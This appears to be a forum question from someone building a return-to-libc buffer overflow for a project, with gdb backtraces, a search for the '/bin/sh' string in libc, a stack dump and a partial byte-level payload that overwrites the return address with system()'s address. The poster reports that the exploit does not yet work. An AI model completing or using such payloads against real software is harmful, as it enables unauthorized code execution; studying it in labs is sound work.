Buffer Overflow to /bin/sh

I am trying to do a buffer overflow for a project. The buffer needs to overflow to /bin/sh. I have found the correct return address, but I do not seem to be successfully getting an overflow.

Program received signal SIGSEGV, Segmentation fault.
0xb7fbc544 in msg (params) at myfile.c:167
167     msg_length = ctx->backend->send_msg_pre(msg, msg_length);
(gdb) backtrace
#0  0xb7fbc544 in msg (params) at myfile.c:167
#1  0xb7fbc869 in my_function(params) at myfile.c:912
#2  0xb7e4c190 in ?? () at ../sysdeps/unix/sysv/linux/system.c:76 from /lib/i386-linux-gnu/libc.so.6
Backtrace stopped: previous frame inner to this frame (corrupt stack?)

To find the /bin/sh I followed this post:

(gdb) print &system
$15 = (<text variable, no debug info> *) 0xb7e4c190 <__libc_system>
(gdb) find &system,+9999999,"/bin/sh"
warning: Unable to access 16000 bytes of target memory at 0xb7fc292c, halting search.
1 pattern found.

I have found the return address and verified it is correct (if I replace it with a different function, it calls that function). The original return address is bolded:

0xbffff690: 0x90909090 0x90909090 0x90909090 0xb7e4c190
0xbffff6a0: 0xb7f6ca24 0x0804c050 0x0000004d 0x0804c158

The payload I sent was 0xb7e4c190 0xb7f6ca24 50

This overflow is a bit more tricky than others, because I need to do some padding to it in the front and the back. The way the item I am overflowing works is that it sets 6 bytes, so each set will take up a portion of one address and another.

I think the problem is that I have to overflow the last byte. I matched what it was originally, but that does not seem to work:

# 0xb7e4c190 (address of system), written little-endian, one byte per list element
payload = payload + ['\x90'] + ['\xc1'] + ['\xe4'] + ['\xb7']
# 0xb7f6ca24 (the address following it on the stack), little-endian, then the trailing 0x50 byte
payload = payload + ['\x24'] + ['\xca'] + ['\xf6'] + ['\xb7'] + ['\x50']

Is there something I am missing here? Because the stack does not show the /bin/sh call in the overflow, I feel like that is not correct.
